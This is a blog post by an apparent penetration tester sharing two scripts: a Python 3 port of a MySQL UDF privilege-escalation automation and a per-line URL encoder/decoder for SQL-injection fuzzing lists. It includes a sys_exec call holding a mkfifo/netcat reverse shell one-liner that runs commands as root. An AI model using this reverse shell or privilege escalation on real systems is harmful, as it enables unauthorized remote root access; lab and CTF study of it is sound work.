Tools & Scripts

Couple of Python Scripts

I haven’t had as much time as I would have liked to start on some other projects. But I have uploaded two new scripts to my GitHub (


This is a really useful script but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x ( did a great job at automating this MySQL privilege escalation (

As you can see there are usually a number of manual steps to complete this privesc. However, if you find yourself in a position where you can use this exploit then simply running this script and passing the MySQL username and password will automate the process.

python3 --username root --password rootPassword

You may or may not have success with the root shell it attempts to open for you. In my experience, I had to exit the shell it put me in and return to the MySQL instance before using the following commands to execute commands as root.

select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80 >/tmp/f');


What is this script?

This was a quick Python script I put together to URL encode / decode lists.

Why did I create it?

This can have a lot of uses, not just in pentesting / CTF exercises. The reason I made this in particular was that I was in a situation where I could not use a tool such as sqlmap to detect SQL injection, and instead of manually testing everything from my SQL injection cheat sheet, I could automate it with a tool like wfuzz.

Where have I used it?

I recommend checking out bootlesshackers Insanity Hosting machine on Vulnhub for an example box of where this may be useful.

Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.

Now, if you have the Community version of Burp, using Intruder like this can take a long time, especially if you have a large list. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your input file for wfuzz.


Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.

Other ways of doing this?

There are lots of ways / scripts to do this, and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire contents into a single line, which doesn’t help you if you want to use it in an attack like the one mentioned above.
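A minimal sketch of the per-line behaviour described above, added here as an example and not the author's script: each entry is encoded or decoded on its own, so the output keeps one entry per line. The function names, the constructed sample strings and the choice to percent-encode every reserved character (`safe=""`) are assumptions.

```python
import sys
from urllib.parse import quote, unquote


def encode_lines(lines, safe=""):
    """URL-encode each entry separately so the output stays one entry per line."""
    out = []
    for line in lines:
        entry = line.rstrip("\r\n")      # drop the line ending, keep inner spaces
        if entry:                        # skip blank lines instead of emitting empty entries
            out.append(quote(entry, safe=safe))
    return out


def decode_lines(lines):
    """Reverse of encode_lines: decode each entry on its own line."""
    out = []
    for line in lines:
        entry = line.rstrip("\r\n")
        if entry:
            out.append(unquote(entry))
    return out


# Constructed sample list (mixed line endings, a blank line, non-ASCII text).
SAMPLE = ["name=O'Brien & Sons\n", "path/with spaces?x=1\r\n", "\n", "100% café\n"]


def main(argv):
    if len(argv) != 3 or argv[1] not in ("encode", "decode"):
        print(f"usage: {argv[0]} encode|decode <list-file>", file=sys.stderr)
        return 2
    convert = encode_lines if argv[1] == "encode" else decode_lines
    with open(argv[2], encoding="utf-8") as fh:
        print("\n".join(convert(fh)))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The decode direction is equally useful for reading percent-encoded entries pulled out of web server logs, one per line.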

Anyway I hope someone finds these scripts useful.